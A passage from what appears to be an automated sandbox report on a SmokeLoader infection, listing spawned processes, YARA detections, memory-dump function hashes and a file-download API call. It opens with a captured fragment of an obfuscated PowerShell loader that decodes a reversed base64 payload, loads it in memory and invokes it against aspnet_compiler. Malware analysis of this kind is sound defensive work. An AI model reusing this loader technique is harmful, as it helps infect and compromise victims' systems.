$tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() \| ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Imagebase:	0x1f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:09:02
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:09:23
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x4e0000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:09:28
Start date:	08/01/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	05:09:47
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\icgfugf
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\icgfugf
Imagebase:	0x730000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:09:48
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:09:49
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x240000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:09:50
Start date:	08/01/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:09:51
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x240000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:09:52
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x240000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	05:09:54
Start date:	08/01/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:09:55
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x240000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	05:09:55
Start date:	08/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7912 -s 420
Imagebase:	0x7ff6c25f0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:09:56
Start date:	08/01/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	05:09:57
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x240000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	05:09:58
Start date:	08/01/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	05:10:01
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\icgfugf
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\icgfugf
Imagebase:	0x310000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	05:10:01
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 06510A99 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1656556301.0000000006510000.00000010.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6510000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b28c77eea66f2fce201fb6c601c5fb27d1c06ce47093af01bdbf2bfea2e6268a
Instruction ID: 8cc7d309a0cd0ce47be4978e12fa89a092cdaf47a9a5acf518568022f512b70c
Opcode Fuzzy Hash: b28c77eea66f2fce201fb6c601c5fb27d1c06ce47093af01bdbf2bfea2e6268a
Instruction Fuzzy Hash: F111E974A403049FFB40CF98C982BBDF7F5BF89254F150859E501AB380DB748C418BA0

Function 06511294 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1656541740.0000000006511000.00000010.00000800.00020000.00000000.sdmp, Offset: 06511000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6511000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02f52cf50ad2183be4154e6ca293ea642054f2e1ef80df3792a419d73dfa7ed
Instruction ID: a8e9976d9689a30a164f059c4a26d9467d75591baebe25b9c3e292916417e36c
Opcode Fuzzy Hash: b02f52cf50ad2183be4154e6ca293ea642054f2e1ef80df3792a419d73dfa7ed
Instruction Fuzzy Hash: 4711E675A403049FFBA08F9888827BDF7F5BF99750F150899E646EB340D6B4CC018B61

Function 06510295 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1656556301.0000000006510000.00000010.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6510000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1126d2291d017ff4647c31cc1da85155d0e30a0b5179e2b8872d5c19b5e030df
Instruction ID: 9b63663b0dcf856d5ca224091f3718ca25e8df6915023177914a17b884a82765
Opcode Fuzzy Hash: 1126d2291d017ff4647c31cc1da85155d0e30a0b5179e2b8872d5c19b5e030df
Instruction Fuzzy Hash: 4E11E5B1A443045FE7518FA88D41BBDFBFA6FA6340F29048AE101EB291DBB4CD418750

Function 06430FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1656578803.0000000006430000.00000010.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6430000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 06430FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1656578803.0000000006430000.00000010.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6430000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 7608, Parent PID: 7520COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.3%
Total number of Nodes:	59
Total number of Limit Nodes:	8

Executed Functions

Function 04987A18 Relevance: 1.9, APIs: 1, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1762409727.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6290527cc6ae913d78e244ccd952ae0e95a18fb5ed99ff668e21f4e48f8d6cec
Instruction ID: b364652d2e17b1ae01d4fcc030a4da48979a56b57a613582307c406c8fddfb1e
Opcode Fuzzy Hash: 6290527cc6ae913d78e244ccd952ae0e95a18fb5ed99ff668e21f4e48f8d6cec
Instruction Fuzzy Hash: 2AE10B75A01219EFCB05DF98D884A9EFBB2FF48310F248569E809AB351C735AD81CB90

Function 074B1F40 Relevance: 5.6, Strings: 4, Instructions: 586
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 074B23D8
4'^q, xrefs: 074B23E2
4'^q, xrefs: 074B2288
4'^q, xrefs: 074B227E

Memory Dump Source

Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 3d29f8fdecbef69e2c5974f8f89fd86b8776f2ee696a6e65cbbd8fa00e326bfb
Instruction ID: 3133aa95156d5a0edda63a66d54a54adb62135d2e1626c7d39484ee334ef3c23
Opcode Fuzzy Hash: 3d29f8fdecbef69e2c5974f8f89fd86b8776f2ee696a6e65cbbd8fa00e326bfb
Instruction Fuzzy Hash: AB1226B1B043558FCB258B7888117EB7BA6AFC6311F1488ABD905CF381DA71DD46C7A2

Function 074B4610 Relevance: 2.9, Strings: 2, Instructions: 441
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP^q, xrefs: 074B4648
tP^q, xrefs: 074B4652

Memory Dump Source

Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: b3ea380c02a88c9fa85d0cfbcd64a88683315942b8a0824d602ec00a7c6b7d2e
Instruction ID: 6ec502c412a0976f2623387941968a5fc53d6ec259e94b7da975aefe11ed4b28
Opcode Fuzzy Hash: b3ea380c02a88c9fa85d0cfbcd64a88683315942b8a0824d602ec00a7c6b7d2e
Instruction Fuzzy Hash: DDF106B5B00245AFDB249F6CC405BAABBE2EFC9310F14886AE9059B351DB31DC46C7E1

Function 074B04F8 Relevance: 2.7, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP^q, xrefs: 074B057E
tP^q, xrefs: 074B058A

Memory Dump Source

Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: 71e9131d4a3bd879f56538e9c8293be1d36d4ad49c587568b0d39e0f1e6d73b0
Instruction ID: 6fcea08a4175544fd1e3e0125574c54a64c9acec99dc54fcb5ad24369a67694e
Opcode Fuzzy Hash: 71e9131d4a3bd879f56538e9c8293be1d36d4ad49c587568b0d39e0f1e6d73b0
Instruction Fuzzy Hash: 09514AB1B003146FDB309B6888147ABBFE2AF89711F55C86BE549DF391CA31DC4687A1

Function 04981BF8 Relevance: 1.6, APIs: 1, Instructions: 68
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 04987E99

Memory Dump Source

Source File: 00000004.00000002.1762409727.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4980000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 81559c6a6c8aa8cd52374eb709d2e8c27ef6c9c8b21ee65494365deabbb3ec5b
Instruction ID: 8c4f4d780a9d59864da5ac66425302ffd84d76c6275f3d6fe27488100edbaea1
Opcode Fuzzy Hash: 81559c6a6c8aa8cd52374eb709d2e8c27ef6c9c8b21ee65494365deabbb3ec5b
Instruction Fuzzy Hash: 372117B5D01319EFCB00DF99D888ADEFBF4FB48310F208569E918A7250D374AA54CBA0

Function 074B45F5 Relevance: 1.5, Strings: 1, Instructions: 241
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP^q, xrefs: 074B4648

Memory Dump Source

Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q
API String ID: 0-2862610199
Opcode ID: 3582f4ae67ff487b8e4d0cf9831daa747d6573d14a06645ac58c1ff1b336d4dd
Instruction ID: 762c8653e53c778290168e83a9326f5fba26e0efbba559a76f11cec5befb71c6
Opcode Fuzzy Hash: 3582f4ae67ff487b8e4d0cf9831daa747d6573d14a06645ac58c1ff1b336d4dd
Instruction Fuzzy Hash: 0C91D4B4A002459FDB24CF6CC541BEABBF2BF89710F54845AE9059B352D731EC46CBA1

Function 074B45AD Relevance: 1.5, Strings: 1, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP^q, xrefs: 074B4648

Memory Dump Source

Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q
API String ID: 0-2862610199
Opcode ID: 7550358a9043c5fb1b7dbfd73ff1376396d63625a67b7852b0a9d8d30075bd37
Instruction ID: 700233eb24532596c03d65b48d3109b8a2c76aa320dc9d4720d1300a73f74301
Opcode Fuzzy Hash: 7550358a9043c5fb1b7dbfd73ff1376396d63625a67b7852b0a9d8d30075bd37
Instruction Fuzzy Hash: 4D91C3B4E002859FDB24CF6CC544BEAB7B2BF89710F64885AD9059B352D731EC46CBA1

Function 074B1F38 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae2bc5b62c077f88fde41912d4464a611954b598f3c5b46b7cf2045f6df306c0
Instruction ID: 26c7f100acd8ee47171c21fffec1a40ee599f17882b6eb9110eabb2428141db5
Opcode Fuzzy Hash: ae2bc5b62c077f88fde41912d4464a611954b598f3c5b46b7cf2045f6df306c0
Instruction Fuzzy Hash: F041E4F4A14217CBDB30CB248901BEB7BA2AF81254F5584AAD6049B391D771DD82CB71

Function 02E7D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1762077583.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d657b0f1c7bd67e8ee7062b216725ca88d9fbd444cb3f971175a540d36a8c7c
Instruction ID: 7aee574f566ac847e010cc90fc5c887b3eda82bb0c73742985a23c478011df35
Opcode Fuzzy Hash: 6d657b0f1c7bd67e8ee7062b216725ca88d9fbd444cb3f971175a540d36a8c7c
Instruction Fuzzy Hash: 5201296204E3C09ED7128B258C94B52BFB4DF53228F1DC1DBD9888F1A3C3695849C772

Function 02E7D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1762077583.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a932e3a28c3e8f251d7135e8f03ed7af9826966ad26d58f093b08a1802f868
Instruction ID: 7393ed8b24e0d30fe100b6fb39a5f432941ebf11626eb4249a903bb5450fea42
Opcode Fuzzy Hash: 90a932e3a28c3e8f251d7135e8f03ed7af9826966ad26d58f093b08a1802f868
Instruction Fuzzy Hash: BC01F2720483409AE7208A29CC84BA7BFD8DF51339F08E42AED084B286C7789842C7B1

Non-executed Functions

Function 074B15A8 Relevance: 9.2, Strings: 7, Instructions: 488COMMON

Download Yara Rule

Strings

tP^q, xrefs: 074B1625
4'^q, xrefs: 074B1819
4'^q, xrefs: 074B180F
tP^q, xrefs: 074B1631
$^q, xrefs: 074B15E0
$^q, xrefs: 074B15BA
$^q, xrefs: 074B15EC

Memory Dump Source

Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: f5c8f74b5068b2d6bf1b326f833d51e2d69417c037274a114642278a886c2243
Instruction ID: 27cf313c68855fdf67fc8b9ddac0a0903900b8562a10bc84f35a414f7f449124
Opcode Fuzzy Hash: f5c8f74b5068b2d6bf1b326f833d51e2d69417c037274a114642278a886c2243
Instruction Fuzzy Hash: CFF106B1B0425A8FDB249B6888207EBBBE6AF96311F14886FD405CB351DB31DD46C7E1

Function 074B3D30 Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

4'^q, xrefs: 074B3DD6
4'^q, xrefs: 074B3F77
4'^q, xrefs: 074B3DE2
4'^q, xrefs: 074B3F83

Memory Dump Source

Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 36bc1393c8c89425878e3cf52d6a4c1314dc277d35edb10c083855cb32de8fd4
Instruction ID: 19cd241d7ddefe0c9627fccbdaedad0568931692bbeab2ef4bccf1077c56defe
Opcode Fuzzy Hash: 36bc1393c8c89425878e3cf52d6a4c1314dc277d35edb10c083855cb32de8fd4
Instruction Fuzzy Hash: 018102B1B04215CFCB258F6AC8046EABBF2EF8A211F1484ABD459CB351DB31DC49C7A1

Function 074B3550 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 074B35B8
$^q, xrefs: 074B35AC
$^q, xrefs: 074B357E
$^q, xrefs: 074B3562

Memory Dump Source

Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 74f8fd8ed7c7eee1afc6c83084d4bd02aa45bb905e6b6350c4c9c04e4201aebb
Instruction ID: dd7e1da9bc732705cfc14b2cca47044fd03efc31116d6827f0550a6965af8cb2
Opcode Fuzzy Hash: 74f8fd8ed7c7eee1afc6c83084d4bd02aa45bb905e6b6350c4c9c04e4201aebb
Instruction Fuzzy Hash: C52137F171031AABDB349D6B8841BF7AADADBC4711F61882B9509CB3C1DD31DC468271

Function 074B0081 Relevance: 5.0, Strings: 4, Instructions: 43COMMON

Download Yara Rule

Strings

$^q, xrefs: 074B00D6
4'^q, xrefs: 074B00F7
4'^q, xrefs: 074B00EB
$^q, xrefs: 074B00CA

Memory Dump Source

Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: e5b01c90f63a220075e5b91439999cdc78fa5edc229d95f2363bda773894b13f
Instruction ID: 94c654c17414613d6958b6f1b4e1c5cc2ffbc050cc53c4fba7cca628837276c9
Opcode Fuzzy Hash: e5b01c90f63a220075e5b91439999cdc78fa5edc229d95f2363bda773894b13f
Instruction Fuzzy Hash: 6601DB71B093958FC72A16382C341976FB26FC261276989DBC080DF26BCE254C4A83A7

Analysis Process: powershell.exePID: 7948, Parent PID: 7900COMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	42.6%
Total number of Nodes:	61
Total number of Limit Nodes:	18

Executed Functions

Function 0420BA80 Relevance: 9.7, APIs: 3, Strings: 2, Instructions: 984COMMON

Download Yara Rule

Strings

Xbq, xrefs: 0420BABF
$^q, xrefs: 0420BAA6

Memory Dump Source

Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4200000_powershell.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: c9721f2e71647c1c5835f81ba8dbecc0e8343654597ccec4b9cad3b544093fdb
Instruction ID: 859cc2269fa519581dc662961310159636a1406c27f9f219845548fcb40b5c91
Opcode Fuzzy Hash: c9721f2e71647c1c5835f81ba8dbecc0e8343654597ccec4b9cad3b544093fdb
Instruction Fuzzy Hash: 44827F70B1021ACFDB28DF65C9447AABBF2BB84314F14C6A9D4599B292DB70F981CF50

Function 04207C48 Relevance: .8, Instructions: 804
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4200000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cbe153bc1c86812cf8e54c7f54bf5126ab2209e5907ce959717ef3a550e06af
Instruction ID: a3aacf40efefe14c3f2244a492b714593bac589ba9970c270ec377745a17e7d2
Opcode Fuzzy Hash: 1cbe153bc1c86812cf8e54c7f54bf5126ab2209e5907ce959717ef3a550e06af
Instruction Fuzzy Hash: 75720674B112148FDB54AFB4E8587AD7BF2AF88301F1081A9DA4AA3391DF345D82CB61

Function 070A0978 Relevance: 16.7, Strings: 13, Instructions: 498
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 070A0DF1
4'^q, xrefs: 070A0C4F
$^q, xrefs: 070A0DE5
$^q, xrefs: 070A0A98
$^q, xrefs: 070A0DC7
$^q, xrefs: 070A0DD3
$^q, xrefs: 070A0A36
$^q, xrefs: 070A0DAB
4'^q, xrefs: 070A0AB3
4'^q, xrefs: 070A0C5B
$^q, xrefs: 070A0A8C
